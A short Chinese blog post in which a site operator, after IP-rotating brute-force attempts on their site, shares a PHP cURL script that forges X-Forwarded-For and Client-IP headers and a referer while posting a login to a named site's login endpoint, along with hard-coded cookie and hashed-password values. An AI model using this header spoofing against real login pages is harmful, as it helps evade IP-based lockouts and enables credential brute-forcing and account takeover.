之前遇到很多瞬间切换ip来穷举我们网站的举动。。
于是自己弄了一个假ip登录程序,看看能不能玩,结果还真可以模拟ip后登录。
php code:
[code lang=”php”]
<?php
$ch = curl_init();
$curlPost="verifyCodeLogin=6742&username=sss112&password=0b0f136cfbebb76c82e4c73fc5b96c0ca80e291a43ac761145cd6c856e3ea778152dadc4eb01fdf0e75822e289b46184080ee92e9773ce42c3aaed2ccc14ec3b43e3f96b106edbe38a704053031008d6dc061e33c6308a5d370fff9cf638838656302170c51aac04449295436dab98db5b59d7d7c6cb5e0cb43ad6dfff1aa580";
$cookie = ‘ Hm_lvt_af1381d7990a1063480b619a263c15c6=1379828514,1379905666,1380011622,1380020129; __utma=236137693.1042694505.1367132741.1367132741.1367132741.1; __utmz=236137693.1367132741.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Hm_lvt_af1381d7990a1063480b619a263c15c6=1372329074,1372735931; PHPSESSID=d8125c8357268eda0eaf1b22d32b5ed7; Hm_lpvt_af1381d7990a1063480b619a263c15c6=1380043306’;
curl_setopt($ch, CURLOPT_URL, "http://www.mjyx.com/Public/doLogin");
curl_setopt($ch, CURLOPT_HTTPHEADER, array(‘X-FORWARDED-FOR:8.8.8.8’, ‘CLIENT-IP:8.8.8.8’)); //构造IP
curl_setopt($ch, CURLOPT_REFERER, "http://www.mjyx.com/"); //构造来路
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch,CURLOPT_POSTFIELDS,$curlPost);
if(@$cookie){
curl_setopt($ch, CURLOPT_COOKIE, $cookie);
}
$out = curl_exec($ch);
curl_close($ch);
echo ‘<br>’;
echo $_SERVER["REMOTE_ADDR"];
?>
[/code]